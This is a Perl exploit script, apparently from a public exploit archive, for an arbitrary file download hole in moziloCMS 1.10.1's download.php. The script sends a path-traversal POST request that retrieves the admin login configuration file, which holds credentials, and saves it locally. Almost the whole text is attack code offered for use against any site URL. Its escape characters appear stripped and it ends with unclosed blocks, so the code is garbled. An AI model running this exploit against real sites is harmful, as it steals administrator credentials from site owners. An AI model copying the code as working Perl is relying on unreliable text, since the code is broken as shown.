moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

#!/usr/bin/perl

# moziloCMS 1.10.1 Perl exploit

# discovered & written by Ams

# ax330d [doggy] gmail [dot] com

# DESCRIPTION:

# Vulnerability hides in "download.php", which we can use to download any file we want to.

# Here, for example, "admin/conf/logindata.conf". (Btw, not very smart solution to keep it open

# not looking on that it is protected by .htaccess)

# Script does not filters global params, it only checks whether local file exists...

# (By the way, all downloads are logged to "/conf/downloads.conf")

# USAGE:

# Run exploit :perl expl.pl http://www.site.com

# NEEDED:

# magic_quotes_gpc = off

use strict;

use IO::Socket;

print "nt~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ntt moziloCMS 1.10.1 exploit (by Ams)

nt~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~nn";

if(@ARGV<1){

die "ntUsage:texpl.pl [host]nn

ntExample:texpl.pl http://localhost/blog/nn";

}

my $expl_url = $ARGV[0];

print "nt[~] Starting exploit...n";

if($expl_url =~ m#http://#) {

exploit($expl_url);

} else {

exploit('http://'.$expl_url);

}

sub exploit {

# Defining vars.

my $site = pop @_;

my ($a, $b, $c, @d) = split ///,$site;

my $path = join('/',@d);

my $host = $c;

if($path) {$path = '/'.$path;}

my ($length, $packet, $downloaded, $injection);

# Revealing /data/sess.php.

print "nt[~] Sending request to 'downloads.php'...n";

$injection = "file=hola&cat=../admin/conf/logindata.conf";

$length = length($injection);

$packet = "POST $path/download.php HTTP/1.1rn";

$packet .= "Host: $hostrn";

$packet .= "Connection: Closern";

$packet .= "Content-Type: application/x-www-form-urlencodedrn";

$packet .= "Content-Length: $lengthrnrn";

$packet .= "$injection";

$downloaded = send_surprise($host, $packet, 1);

if($downloaded =~ /hackin/) {

print "nt[-] Exploiting failed...n";

} elsif ($downloaded =~ /200 OK/) {

# Parsing and saving received data.

$downloaded =~ /rnrn/ ;

$downloaded = $';

open(DOWNL, ">hola.txt");

print DOWNL $downloaded;

close(DOWNL);

print "nt[ ] Looks like ok! Check hola.txtn";

} else {

print "nt[-] Exploiting failed...n";

}

sub send_surprise() {

my $dat = 1;

my ($host, $packet, $ret) = @_;

my $socket=IO::Socket::INET->new(

Proto=>"tcp",

PeerAddr=>$host,

PeerPort=>"80"

);

if( ! $socket) {

return 0;

} else {

print $socket $packet;

if($ret) {

my $rcv;

while($rcv = <$socket>) {

$dat .= $rcv;

}

close ($socket);

return $dat;

}